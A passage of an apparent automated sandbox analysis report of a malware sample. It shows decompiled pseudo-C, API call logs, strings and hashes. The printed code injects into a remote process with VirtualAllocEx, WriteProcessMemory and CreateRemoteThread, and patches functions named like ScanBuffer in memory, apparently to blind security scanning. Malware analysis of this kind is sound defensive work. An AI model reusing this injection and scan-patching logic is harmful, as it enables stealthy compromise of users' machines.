				intOrPtr _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				intOrPtr _v368;
				char _v372;
				char _v376;
				char _v380;
				intOrPtr _v384;
				char _v388;
				char _v392;
				char _v396;
				intOrPtr _v400;
				char _v404;
				char _v408;
				void* __ecx;
				void* _t209;
				intOrPtr _t286;
				intOrPtr _t288;
				PVOID* _t291;
				void* _t388;
				intOrPtr _t403;
				struct HINSTANCE__* _t449;
				struct HINSTANCE__* _t450;
				struct HINSTANCE__* _t452;
				long _t454;
				void* _t455;
				long* _t530;
				long* _t531;
				struct HINSTANCE__* _t579;
				struct HINSTANCE__* _t580;
				struct HINSTANCE__* _t582;
				intOrPtr _t586;
				intOrPtr _t588;
				PVOID* _t591;
				intOrPtr _t597;
				intOrPtr _t610;
				void* _t632;
				void* _t637;
				void* _t642;
				void* _t648;
				void* _t653;
				void* _t658;
				void* _t663;
				void* _t668;
				void* _t673;
				void* _t678;
				intOrPtr _t681;
				intOrPtr _t683;
				void* _t689;
				void* _t694;
				void* _t699;
				void* _t704;
				void* _t709;
				void* _t716;
				void* _t721;
				void* _t726;
				void* _t731;
				void* _t736;
				void* _t742;
				void* _t747;
				void* _t752;
				void* _t757;
				intOrPtr _t761;
				intOrPtr _t762;
				void* _t773;

				_t773 = __fp0;
				_t761 = _t762;
				_t597 = 0x32;
				do {
					_push(0);
					_push(0);
					_t597 = _t597 - 1;
				} while (_t597 != 0);
				_t1 =  &_v8;
				 *_t1 = _t597;
				_push(__ebx);
				_v8 =  *_t1;
				_t757 = __eax;
				_push(_t761);
				_push(0x2738401);
				_push( *[fs:eax]);
				 *[fs:eax] = _t762;
				_t209 = E0272304C(0x270e);
				_push(_t209);
				L027358FC();
				if(_t209 == 0) {
					E027248F4(0x2744598, 0x273842c);
				} else {
					E027248F4(0x2744598, 0x273841c);
				}
				_push(0x2738438);
				_push( *0x2744598);
				_push("Initialize");
				E02724C24();
				E02724A98( &_v16, E02724D64(_v20));
				_push(_v16);
				E02724BB0( &_v28,  *0x2744598, 0x2738438);
				E02724A98( &_v24, E02724D64(_v28));
				_pop(_t632); // executed
				E02733690(_v24, 0x2744598, _t632, 0x2744520); // executed
				_push(0x2738438);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v32, E02724D64(_v36));
				_push(_v32);
				E02724BB0( &_v44,  *0x2744598, 0x2738438);
				E02724A98( &_v40, E02724D64(_v44));
				_pop(_t637); // executed
				E02733690(_v40, 0x2744598, _t637, 0x2744520); // executed
				_push(0x2738438);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v48, E02724D64(_v52));
				_push(_v48);
				E02724BB0( &_v60,  *0x2744598, 0x2738438);
				E02724A98( &_v56, E02724D64(_v60));
				_pop(_t642); // executed
				E02733690(_v56, 0x2744598, _t642, 0x2744520); // executed
				_v9 = 0;
				_push(0);
				_push(_v8);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				 *0x274451c =  *((intOrPtr*)(_v8 + 0x3c)) + _v88;
				 *0x2744524 = 0x10000000;
				do {
					_push(0x2738438);
					_push( *0x2744598);
					_push(0x2738480);
					_push(0x273848c);
					_push(0x2738498);
					_push(0x27384a4);
					_push( *0x2744598);
					_push(0x27384b0);
					_push(0x27384bc);
					E02724C24();
					E02724A98( &_v64, E02724D64(_v68));
					_push(_v64);
					E02724BB0( &_v76,  *0x2744598, 0x2738438);
					E02724A98( &_v72, E02724D64(_v76));
					_pop(_t648); // executed
					E02733690(_v72, 0x2744598, _t648, 0x2744520); // executed
					_push(0x2738438);
					_push( *0x2744598);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v80, E02724D64(_v84));
					_push(_v80);
					E02724BB0( &_v92,  *0x2744598, 0x2738438);
					E02724A98( &_v88, E02724D64(_v92));
					_pop(_t653); // executed
					E02733690(_v88, 0x2744598, _t653, 0x2744520); // executed
					 *0x2744524 =  *0x2744524 + 0x10000;
					_t286 =  *0x274451c; // 0x4984ba8
					_t48 = _t286 + 0x50; // 0x2f000
					_t288 =  *0x274451c; // 0x4984ba8
					_t49 = _t288 + 0x34; // 0x400000
					_t291 = VirtualAlloc( *_t49 +  *0x2744524,  *_t48, 0x3000, 0x40); // executed
					 *0x2744520 = _t291;
					_push(0x2738438);
					_push( *0x2744598);
					_push("UacScan");
					E02724C24();
					E02724A98( &_v96, E02724D64(_v100));
					_push(_v96);
					E02724BB0( &_v108,  *0x2744598, 0x2738438);
					E02724A98( &_v104, E02724D64(_v108));
					_pop(_t658); // executed
					E02733690(_v104, 0x2744598, _t658, 0x2744520); // executed
					_push(0x2738438);
					_push( *0x2744598);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v112, E02724D64(_v116));
					_push(_v112);
					E02724BB0( &_v124,  *0x2744598, 0x2738438);
					E02724A98( &_v120, E02724D64(_v124));
					_pop(_t663); // executed
					E02733690(_v120, 0x2744598, _t663, 0x2744520); // executed
					if( *0x2744520 != 0) {
						_push(0x2738438);
						_push( *0x2744598);
						_push("Initialize");
						E02724C24();
						E02724A98( &_v128, E02724D64(_v132));
						_push(_v128);
						E02724BB0( &_v140,  *0x2744598, 0x2738438);
						E02724A98( &_v136, E02724D64(_v140));
						_pop(_t742); // executed
						E02733690(_v136, 0x2744598, _t742, 0x2744520); // executed
						_push(0x2738438);
						_push( *0x2744598);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v144, E02724D64(_v148));
						_push(_v144);
						E02724BB0( &_v156,  *0x2744598, 0x2738438);
						E02724A98( &_v152, E02724D64(_v156));
						_pop(_t747); // executed
						E02733690(_v152, 0x2744598, _t747, 0x2744520); // executed
						_push(0x2738438);
						_push( *0x2744598);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v160, E02724D64(_v164));
						_push(_v160);
						E02724BB0( &_v172,  *0x2744598, 0x2738438);
						E02724A98( &_v168, E02724D64(_v172));
						_pop(_t752); // executed
						E02733690(_v168, 0x2744598, _t752, 0x2744520); // executed
						E02724A98( &_v176, "kernel32");
						_t579 = E0272CAC8(_v176, 0x2744598, 0x8000); // executed
						 *0x27445ac = _t579;
						_t580 =  *0x27445ac; // 0x74ca0000
						 *0x27445a4 = GetProcAddress(_t580, "VirtualFree");
						_t582 =  *0x27445ac; // 0x74ca0000
						FreeLibrary(_t582);
						VirtualFree( *0x2744520, 0, 0x8000); // executed
						_t586 =  *0x274451c; // 0x4984ba8
						_t92 = _t586 + 0x50; // 0x2f000
						_t588 =  *0x274451c; // 0x4984ba8
						_t93 = _t588 + 0x34; // 0x400000
						_t591 = VirtualAllocEx(_t757,  *_t93 +  *0x2744524,  *_t92, 0x3000, 0x40); // executed
						 *0x2744520 = _t591;
					}
				} while ( *0x2744520 == 0 &&  *0x2744524 <= 0x30000000);
				_push(0x2738438);
				_push( *0x2744598);
				_push(0x2738480);
				_push(0x273848c);
				_push(0x2738498);
				_push(0x27384a4);
				_push( *0x2744598);
				_push(0x27384b0);
				_push(0x27384bc);
				E02724C24();
				E02724A98( &_v180, E02724D64(_v184));
				_push(_v180);
				E02724BB0( &_v192,  *0x2744598, 0x2738438);
				E02724A98( &_v188, E02724D64(_v192));
				_pop(_t668); // executed
				E02733690(_v188, 0x2744598, _t668, 0x2744520); // executed
				_push(0x2738438);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v196, E02724D64(_v200));
				_push(_v196);
				E02724BB0( &_v208,  *0x2744598, 0x2738438);
				E02724A98( &_v204, E02724D64(_v208));
				_pop(_t673); // executed
				E02733690(_v204, 0x2744598, _t673, 0x2744520); // executed
				_push(0x2738438);
				_push( *0x2744598);
				_push(0x2738480);
				_push(0x273848c);
				_push(0x2738498);
				_push(0x27384a4);
				_push( *0x2744598);
				_push(0x27384b0);
				_push(0x27384bc);
				E02724C24();
				E02724A98( &_v212, E02724D64(_v216));
				_push(_v212);
				E02724BB0( &_v224,  *0x2744598, 0x2738438);
				E02724A98( &_v220, E02724D64(_v224));
				_pop(_t678); // executed
				E02733690(_v220, 0x2744598, _t678, 0x2744520); // executed
				E02736388(_t757, 0x2744598, _t757, 0x2744520, _t773,  &_v244); // executed
				_t610 =  *0x2735930; // 0x2735934
				E027255FC(0x27444fc, _t610,  &_v244);
				if( *0x27444fc != 0) {
					_push(0x2738438);
					_push( *0x2744598);
					_push(0x2738480);
					_push(0x273848c);
					_push(0x2738498);
					_push(0x27384a4);
					_push( *0x2744598);
					_push(0x27384b0);
					_push(0x27384bc);
					E02724C24();
					E02724A98( &_v248, E02724D64(_v252));
					_push(_v248);
					E02724BB0( &_v260,  *0x2744598, 0x2738438);
					E02724A98( &_v256, E02724D64(_v260));
					_pop(_t689); // executed
					E02733690(_v256, 0x2744598, _t689, 0x2744520);
					_t388 =  *0x27444fc; // 0x10410000
					 *0x2744510 = _t388;
					_push(0x2738438);
					_push( *0x2744598);
					_push(0x2738480);
					_push(0x273848c);
					_push(0x2738498);
					_push(0x27384a4);
					_push( *0x2744598);
					_push(0x27384b0);
					_push(0x27384bc);
					E02724C24();
					E02724A98( &_v264, E02724D64(_v268));
					_push(_v264);
					E02724BB0( &_v276,  *0x2744598, 0x2738438);
					E02724A98( &_v272, E02724D64(_v276));
					_pop(_t694); // executed
					E02733690(_v272, 0x2744598, _t694, 0x2744520);
					_t403 =  *0x2744508; // 0x104112b0
					 *0x2744514 = _t403;
					_push(0x2738438);
					_push( *0x2744598);
					_push("Initialize");
					E02724C24();
					E02724A98( &_v280, E02724D64(_v284));
					_push(_v280);
					E02724BB0( &_v292,  *0x2744598, 0x2738438);
					E02724A98( &_v288, E02724D64(_v292));
					_pop(_t699); // executed
					E02733690(_v288, 0x2744598, _t699, 0x2744520); // executed
					_push(0x2738438);
					_push( *0x2744598);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v296, E02724D64(_v300));
					_push(_v296);
					E02724BB0( &_v308,  *0x2744598, 0x2738438);
					E02724A98( &_v304, E02724D64(_v308));
					_pop(_t704); // executed
					E02733690(_v304, 0x2744598, _t704, 0x2744520); // executed
					_push(0x2738438);
					_push( *0x2744598);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v312, E02724D64(_v316));
					_push(_v312);
					E02724BB0( &_v324,  *0x2744598, 0x2738438);
					E02724A98( &_v320, E02724D64(_v324));
					_pop(_t709); // executed
					E02733690(_v320, 0x2744598, _t709, 0x2744520); // executed
					E02724A98( &_v328, "kernel32");
					_t449 = E0272CAC8(_v328, 0x2744598, 0x8000); // executed
					 *0x27445ac = _t449;
					_t450 =  *0x27445ac; // 0x74ca0000
					 *0x27445a8 = GetProcAddress(_t450, "WriteProcessMemory");
					_t452 =  *0x27445ac; // 0x74ca0000
					FreeLibrary(_t452);
					_t454 =  *0x2744500; // 0x2f000
					_t455 =  *0x27444fc; // 0x10410000
					WriteProcessMemory(_t757,  *0x2744520, _t455, _t454, 0x2744518); // executed
					_push(0x2738438);
					_push( *0x2744598);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v332, E02724D64(_v336));
					_push(_v332);
					E02724BB0( &_v344,  *0x2744598, 0x2738438);
					E02724A98( &_v340, E02724D64(_v344));
					_pop(_t716); // executed
					E02733690(_v340, 0x2744598, _t716, 0x2744520); // executed
					_push(0x2738438);
					_push( *0x2744598);
					_push("Initialize");
					E02724C24();
					E02724A98( &_v348, E02724D64(_v352));
					_push(_v348);
					E02724BB0( &_v360,  *0x2744598, 0x2738438);
					E02724A98( &_v356, E02724D64(_v360));
					_pop(_t721); // executed
					E02733690(_v356, 0x2744598, _t721, 0x2744520); // executed
					_push(0x2738438);
					_push( *0x2744598);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v364, E02724D64(_v368));
					_push(_v364);
					E02724BB0( &_v376,  *0x2744598, 0x2738438);
					E02724A98( &_v372, E02724D64(_v376));
					_pop(_t726); // executed
					E02733690(_v372, 0x2744598, _t726, 0x2744520); // executed
					_push(0x2738438);
					_push( *0x2744598);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v380, E02724D64(_v384));
					_push(_v380);
					E02724BB0( &_v392,  *0x2744598, 0x2738438);
					E02724A98( &_v388, E02724D64(_v392));
					_pop(_t731); // executed
					E02733690(_v388, 0x2744598, _t731, 0x2744520); // executed
					_push(0x2738438);
					_push( *0x2744598);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v396, E02724D64(_v400));
					_push(_v396);
					E02724BB0( &_v408,  *0x2744598, 0x2738438);
					E02724A98( &_v404, E02724D64(_v408));
					_pop(_t736); // executed
					E02733690(_v404, 0x2744598, _t736, 0x2744520); // executed
					E02735B0C(_t757, 0x2744510, E02737774, 0, 8);
					_t530 =  *0x2744518; // 0x71
					_t531 =  *0x2744500; // 0x2f000
					NtProtectVirtualMemory(_t757,  *0x2744520, _t531, 1, _t530);
				}
				_pop(_t681);
				 *[fs:eax] = _t681;
				_push(0x2738408);
				E027248C4( &_v408, 0x29);
				_t683 =  *0x2735930; // 0x2735934
				E02725398( &_v244, _t683);
				return E027248C4( &_v224, 0x35);
			}

0x0273779c
0x0273779d
0x027377a0
0x027377a5
0x027377a5
0x027377a7
0x027377a9
0x027377a9
0x027377ac
0x027377ac
0x027377af
0x027377b2
0x027377b5
0x027377c3
0x027377c4
0x027377c9
0x027377cc
0x027377d4
0x027377d9
0x027377da
0x027377e1
0x027377f8
0x027377e3
0x027377ea
0x027377ea
0x027377fd
0x02737802
0x02737804
0x02737811
0x02737823
0x0273782b
0x02737836
0x02737848
0x02737850
0x02737851
0x02737856
0x0273785b
0x0273785d
0x0273786a
0x0273787c
0x02737884
0x0273788f
0x027378a1
0x027378a9
0x027378aa
0x027378af
0x027378b4
0x027378b6
0x027378c3
0x027378d5
0x027378dd
0x027378e8
0x027378fa
0x02737902
0x02737903
0x02737908
0x02737911
0x02737912
0x02737919
0x0273791d
0x02737924
0x02737929
0x02737933
0x02737933
0x02737938
0x0273793a
0x0273793f
0x02737944
0x02737949
0x0273794e
0x02737950
0x02737955
0x02737962
0x02737974
0x0273797c
0x02737987
0x02737999
0x027379a1
0x027379a2
0x027379a7
0x027379ac
0x027379ae
0x027379bb
0x027379cd
0x027379d5
0x027379e0
0x027379f2
0x027379fa
0x027379fb
0x02737a00
0x02737a11
0x02737a16
0x02737a1a
0x02737a1f
0x02737a29
0x02737a2e
0x02737a30
0x02737a35
0x02737a37
0x02737a44
0x02737a56
0x02737a5e
0x02737a69
0x02737a7b
0x02737a83
0x02737a84
0x02737a89
0x02737a8e
0x02737a90
0x02737a9d
0x02737aaf
0x02737ab7
0x02737ac2
0x02737ad4
0x02737adc
0x02737add
0x02737ae5
0x02737aeb
0x02737af0
0x02737af2
0x02737aff
0x02737b11
0x02737b19
0x02737b27
0x02737b3f
0x02737b4a
0x02737b4b
0x02737b50
0x02737b55
0x02737b57
0x02737b67
0x02737b7f
0x02737b8a
0x02737b98
0x02737bb0
0x02737bbb
0x02737bbc
0x02737bc1
0x02737bc6
0x02737bc8
0x02737bd8
0x02737bf0
0x02737bfb
0x02737c09
0x02737c21
0x02737c2c
0x02737c2d
0x02737c3d
0x02737c4d
0x02737c52
0x02737c5c
0x02737c67
0x02737c6c
0x02737c72
0x02737c81
0x02737c8e
0x02737c93
0x02737c97
0x02737c9c
0x02737ca7
0x02737cac
0x02737cac
0x02737cae
0x02737cc3
0x02737cc8
0x02737cca
0x02737ccf
0x02737cd4
0x02737cd9
0x02737cde
0x02737ce0
0x02737ce5
0x02737cf5
0x02737d0d
0x02737d18
0x02737d26
0x02737d3e
0x02737d49
0x02737d4a
0x02737d4f
0x02737d54
0x02737d56
0x02737d66
0x02737d7e
0x02737d89
0x02737d97
0x02737daf
0x02737dba
0x02737dbb
0x02737dc0
0x02737dc5
0x02737dc7
0x02737dcc
0x02737dd1
0x02737dd6
0x02737ddb
0x02737ddd
0x02737de2
0x02737df2
0x02737e0a
0x02737e15
0x02737e23
0x02737e3b
0x02737e46
0x02737e47
0x02737e5a
0x02737e6a
0x02737e70
0x02737e7c
0x02737e82
0x02737e87
0x02737e89
0x02737e8e
0x02737e93
0x02737e98
0x02737e9d
0x02737e9f
0x02737ea4
0x02737eb4
0x02737ecc
0x02737ed7
0x02737ee5
0x02737efd
0x02737f08
0x02737f09
0x02737f0e
0x02737f13
0x02737f18
0x02737f1d
0x02737f1f
0x02737f24
0x02737f29
0x02737f2e
0x02737f33
0x02737f35
0x02737f3a
0x02737f4a
0x02737f62
0x02737f6d
0x02737f7b
0x02737f93
0x02737f9e
0x02737f9f
0x02737fa4
0x02737fa9
0x02737fae
0x02737fb3
0x02737fb5
0x02737fc5
0x02737fdd
0x02737fe8
0x02737ff6
0x0273800e
0x02738019
0x0273801a
0x0273801f
0x02738024
0x02738026
0x02738036
0x0273804e
0x02738059
0x02738067
0x0273807f
0x0273808a
0x0273808b
0x02738090
0x02738095
0x02738097
0x027380a7
0x027380bf
0x027380ca
0x027380d8
0x027380f0
0x027380fb
0x027380fc
0x0273810c
0x0273811c
0x02738121
0x0273812b
0x02738136
0x0273813b
0x02738141
0x0273814b
0x02738151
0x0273815b
0x02738161
0x02738166
0x02738168
0x02738178
0x02738190
0x0273819b
0x027381a9
0x027381c1
0x027381cc
0x027381cd
0x027381d2
0x027381d7
0x027381d9
0x027381e9
0x02738201
0x0273820c
0x0273821a
0x02738232
0x0273823d
0x0273823e
0x02738243
0x02738248
0x0273824a
0x0273825a
0x02738272
0x0273827d
0x0273828b
0x027382a3
0x027382ae
0x027382af
0x027382b4
0x027382b9
0x027382bb
0x027382cb
0x027382e3
0x027382ee
0x027382fc
0x02738314
0x0273831f
0x02738320
0x02738325
0x0273832a
0x0273832c
0x0273833c
0x02738354
0x0273835f
0x0273836d
0x02738385
0x02738390
0x02738391
0x027383a6
0x027383ab
0x027383b3
0x027383bd
0x027383bd
0x027383c4
0x027383c7
0x027383ca
0x027383da
0x027383e5
0x027383eb
0x02738400

APIs

InetIsOffline.URL(00000000,00000000,02738401,?,?,?,?,00000000,00000000), ref: 027377DA

Part of subcall function 02733690: LoadLibraryA.KERNEL32(00000000,00000000,02733766), ref: 027336CA
Part of subcall function 02733690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02733766), ref: 027336D4
Part of subcall function 02733690: GetProcAddress.KERNEL32(77880000,00000000), ref: 027336FD
Part of subcall function 02733690: RtlMoveMemory.N(027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273371E
Part of subcall function 02733690: GetCurrentProcess.KERNEL32(027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 02733735
Part of subcall function 02733690: NtFlushVirtualMemory.N(00000000,027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273373B
Part of subcall function 02733690: FreeLibrary.KERNEL32(77880000,00000000,00000000,00000000,02733766), ref: 02733746

GetProcAddress.KERNEL32(74CA0000,VirtualFree), ref: 02737C62
FreeLibrary.KERNEL32(74CA0000,74CA0000,VirtualFree,ScanBuffer,02744598,02738438,OpenSession,02744598,02738438,Initialize,02744598,02738438,ScanBuffer,02744598,02738438,UacScan), ref: 02737C72
VirtualFree.KERNELBASE(00000000,00000000,00008000,74CA0000,74CA0000,VirtualFree,ScanBuffer,02744598,02738438,OpenSession,02744598,02738438,Initialize,02744598,02738438,ScanBuffer), ref: 02737C81
VirtualAllocEx.KERNEL32(?,-02344524,0002F000,00003000,00000040), ref: 02737CA7
VirtualAlloc.KERNEL32(-02344524,0002F000,00003000,00000040,ScanBuffer,02744598,02738438,027384BC,027384B0,02744598,027384A4,02738498,0273848C,02738480,02744598,02738438), ref: 02737A29

Part of subcall function 0272CAC8: SetErrorMode.KERNEL32 ref: 0272CAD2
Part of subcall function 0272CAC8: LoadLibraryA.KERNEL32(00000000,00000000,0272CB1C,?,00000000,0272CB3A), ref: 0272CB01

GetProcAddress.KERNEL32(74CA0000,WriteProcessMemory), ref: 02738131
FreeLibrary.KERNEL32(74CA0000,74CA0000,WriteProcessMemory,ScanBuffer,02744598,02738438,OpenSession,02744598,02738438,Initialize,02744598,02738438,027384BC,027384B0,02744598,027384A4), ref: 02738141
WriteProcessMemory.KERNEL32(?,10410000,10410000,0002F000,02744518,74CA0000,74CA0000,WriteProcessMemory,ScanBuffer,02744598,02738438,OpenSession,02744598,02738438,Initialize,02744598), ref: 0273815B

Part of subcall function 02735B0C: CreateRemoteThread.KERNEL32(?,00000000,00000000,047E0000,04740000,00000000,02744534), ref: 02735B58
Part of subcall function 02735B0C: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02735B68
Part of subcall function 02735B0C: ReadProcessMemory.KERNEL32(?,04740000,?,?,02744530,00000000,000000FF), ref: 02735B7E

NtProtectVirtualMemory.N(?,0002F000,0002F000,00000001,00000071,OpenSession,02744598,02738438,ScanBuffer,02744598,02738438,OpenSession,02744598,02738438,Initialize,02744598), ref: 027383BD

Strings

OpenSession, xrefs: 0273785D, 02737B57, 02738026, 02738168, 0273824A, 0273832C
UacScan, xrefs: 02737A37
kernel32, xrefs: 02737C38, 02738107
VirtualFree, xrefs: 02737C57
Initialize, xrefs: 02737804, 02737AF2, 02737FB5, 027381D9
teSe, xrefs: 027377E5
WriteProcessMemory, xrefs: 02738126
ScanBuffer, xrefs: 027378B6, 027379AE, 02737A90, 02737BC8, 02737D56, 02738097, 027382BB

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: LibraryMemoryVirtual$Free$AddressProcProcess$AllocLoad$CreateCurrentErrorFlushHandleInetModeModuleMoveObjectOfflineProtectReadRemoteSingleThreadWaitWrite
String ID: Initialize$OpenSession$ScanBuffer$UacScan$VirtualFree$WriteProcessMemory$kernel32$teSe
API String ID: 1742017062-2541080484
Opcode ID: e72668c31ba8f3f4c62e7b7103703b0b27427afffbf3aa979ab30501a247b620
Instruction ID: b12fe8872ca8226fac8f69687b7f650225ce65766de85d8d9512397c3ece58ea
Opcode Fuzzy Hash: e72668c31ba8f3f4c62e7b7103703b0b27427afffbf3aa979ab30501a247b620
Instruction Fuzzy Hash: 45624D75A002289FDB23EB64DCA4FCEB3B6EF44310F5084A6E105AB615DB70AE49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0273368E Relevance: 10.6, APIs: 7, Instructions: 73
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0273368E(intOrPtr __eax, void* __ebx, char __edx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t21;
				CHAR* _t24;
				struct HINSTANCE__* _t25;
				struct _ERESOURCE_LITE _t28;
				intOrPtr _t37;
				CHAR* _t40;
				void* _t43;

				_v12 = __edx;
				_v8 = __eax;
				E02724D54(_v8);
				E02724D54(_v12);
				_push(_t43);
				_push(0x2733766);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff8;
				_t40 = E02724D64(_v8);
				_t16 = LoadLibraryA(_t40); // executed
				if(_t16 != 0) {
					 *0x27442f8 = GetModuleHandleA(_t40);
					if( *0x27442f8 != 0) {
						0;
						_t24 = E02724D64(_v12);
						_t25 =  *0x27442f8; // 0x77880000
						 *0x27442fc = GetProcAddress(_t25, _t24);
						if( *0x27442fc != 0) {
						}
						RtlMoveMemory(0x27442fc, 0x2726a20, 4);
						_t28 = E0272304C(7);
						NtFlushVirtualMemory(GetCurrentProcess(), 0x27442fc, 4, _t28);
					}
					_t21 =  *0x27442f8; // 0x77880000
					FreeLibrary(_t21);
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E0273376D);
				return E027248C4( &_v12, 2);
			}

0x02733698
0x0273369b
0x027336a1
0x027336a9
0x027336b0
0x027336b1
0x027336b6
0x027336b9
0x027336c7
0x027336ca
0x027336d1
0x027336d9
0x027336e5
0x027336ed
0x027336f1
0x027336f7
0x02733702
0x0273370e
0x0273370e
0x0273371e
0x02733728
0x0273373b
0x0273373b
0x02733740
0x02733746
0x02733746
0x0273374d
0x02733750
0x02733753
0x02733765

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02733766), ref: 027336CA
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02733766), ref: 027336D4
GetProcAddress.KERNEL32(77880000,00000000), ref: 027336FD
RtlMoveMemory.N(027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273371E
GetCurrentProcess.KERNEL32(027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 02733735
NtFlushVirtualMemory.N(00000000,027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273373B
FreeLibrary.KERNEL32(77880000,00000000,00000000,00000000,02733766), ref: 02733746

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: LibraryMemory$AddressCurrentFlushFreeHandleLoadModuleMoveProcProcessVirtual
String ID:
API String ID: 1189176514-0
Opcode ID: 94138e3d47cae5db10b8d793f6e9e63cfa37fb93fd59633566fc7f49c8dce866
Instruction ID: 7c13684dfeeb34e3b7286b8dcbb056da00717a467ee8ade86df772a07188476c
Opcode Fuzzy Hash: 94138e3d47cae5db10b8d793f6e9e63cfa37fb93fd59633566fc7f49c8dce866
Instruction Fuzzy Hash: 481166B0A40615AFE722FBA5C899F5E77EDEB05700F4144A6E510E3250DB346D44EE54

Uniqueness

Uniqueness Score: -1.00%

Function 02733690 Relevance: 10.6, APIs: 7, Instructions: 72
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E02733690(intOrPtr __eax, void* __ebx, char __edx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t21;
				CHAR* _t24;
				struct HINSTANCE__* _t25;
				struct _ERESOURCE_LITE _t28;
				intOrPtr _t37;
				CHAR* _t40;
				void* _t43;

				_v12 = __edx;
				_v8 = __eax;
				E02724D54(_v8);
				E02724D54(_v12);
				_push(_t43);
				_push(0x2733766);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff8;
				_t40 = E02724D64(_v8);
				_t16 = LoadLibraryA(_t40); // executed
				if(_t16 != 0) {
					 *0x27442f8 = GetModuleHandleA(_t40);
					if( *0x27442f8 != 0) {
						0;
						_t24 = E02724D64(_v12);
						_t25 =  *0x27442f8; // 0x77880000
						 *0x27442fc = GetProcAddress(_t25, _t24);
						if( *0x27442fc != 0) {
						}
						RtlMoveMemory(0x27442fc, 0x2726a20, 4);
						_t28 = E0272304C(7);
						NtFlushVirtualMemory(GetCurrentProcess(), 0x27442fc, 4, _t28);
					}
					_t21 =  *0x27442f8; // 0x77880000
					FreeLibrary(_t21);
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E0273376D);
				return E027248C4( &_v12, 2);
			}

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02733766), ref: 027336CA
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02733766), ref: 027336D4
GetProcAddress.KERNEL32(77880000,00000000), ref: 027336FD
RtlMoveMemory.N(027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273371E
GetCurrentProcess.KERNEL32(027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 02733735
NtFlushVirtualMemory.N(00000000,027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273373B
FreeLibrary.KERNEL32(77880000,00000000,00000000,00000000,02733766), ref: 02733746

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: LibraryMemory$AddressCurrentFlushFreeHandleLoadModuleMoveProcProcessVirtual
String ID:
API String ID: 1189176514-0
Opcode ID: febac95edca285750ea2e1331be5d35d643384e265de210562c1cc7c0558dd43
Instruction ID: b8c46c0728f1771474260772dcad9850322ddcd1ce874c1183c12a92500229cf
Opcode Fuzzy Hash: febac95edca285750ea2e1331be5d35d643384e265de210562c1cc7c0558dd43
Instruction Fuzzy Hash: D71186B0A40615AFEB22FBA5C8A9F5E77EDEB05700F8144A6E510E3250DB346944EF64

Uniqueness

Uniqueness Score: -1.00%

Function 02738CBC Relevance: 7.6, APIs: 5, Instructions: 97
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

